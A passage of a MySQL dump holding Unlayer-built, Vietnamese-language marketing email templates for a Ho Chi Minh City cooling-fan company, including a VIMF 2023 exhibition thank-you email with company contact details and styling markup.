\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jYPxTblxnF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#95a5a6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3aEaFlSHzS\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680168298010-tiet-kiem-dien-s10.jpg\\\",\\\"width\\\":1280,\\\"height\\\":720},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_15\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"HG30UIk3ly\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"19px 33px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"28px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\\\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZA8TJ3zleD\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 4px 4px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"squared\\\",\\\"icons\\\":[{\\\"url\\\":\\\" https:\\/\\/www.facebook.com\\/bigfans.vn\\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\" https:\\/\\/twitter.com\\/hgpco\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\" https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\" https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\" https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":19,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"mobile\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"hideMobile\\\":false}}}},{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">-------o0o------<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83c\\udf10\\u00a0<a href=\\\\\\\"https:\\/\\/www.bigfans.vn\\/\\\\\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83c\\udf10\\u00a0<a href=\\\\\\\"https:\\/\\/quattran.co\\/\\\\\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"8hu9zilO_e\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"91%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#616888\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"19px 19px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#bbbbbb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"headers\\\":[],\\\"footers\\\":[],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#363675\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":16}\"', '', 1, '2023-03-30 16:06:12');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(18, 'VIMF-2023-Thanks_You', '', 4, 1, 'vietnamese', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_image_1 .v-src-width { width: auto !important; } #u_content_image_1 .v-src-max-width { max-width: 90% !important; } #u_content_text_2 .v-text-align { text-align: center !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #fdf4ef;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #fdf4ef;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #fdf4ef;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #000000\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #000000;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #000000;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #000000;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_1\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 15px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/hogiaphat.vn\\/\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181449479-logo.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 94%;max-width: 545.2px;\\\" width=\\\"545.2\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #040505\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #040505;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:80px 10px 15px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: inherit; font-size: 14px; font-weight: 400; color: #ecf0f1; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><span style=\\\"font-size: 44px; line-height: 61.6px;\\\"><strong>VIMF 2023<\\/strong><\\/span><\\/span><\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 10px; line-height: 14px;\\\">Tri\\u1ec3n L\\u00e3m Qu\\u1ed1c T\\u1ebf Chuy\\u00ean Ngh\\u00e0nh V\\u1ec1 M\\u00e1y M\\u00f3c Thi\\u1ebft B\\u1ecb, Dung C\\u1ee5 V\\u1eadt Li\\u1ec7u, C\\u00f4ng Ngh\\u1ec7 K\\u1ef9 Thu\\u1eadt \\u1ee8ng D\\u1ee5ng Cho Ngh\\u00e0nh C\\u00f4ng Nghi\\u1ec7p S\\u1ea3n Xu\\u1ea5t.<\\/span><\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 10px; line-height: 14px;\\\"><span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u25b9\\u25b9\\u25b9<\\/span>Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t <span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u25b9\\u25b9\\u25b9 -\\u00a0<\\/span><\\/span><\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 10px; line-height: 14px;\\\">MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td 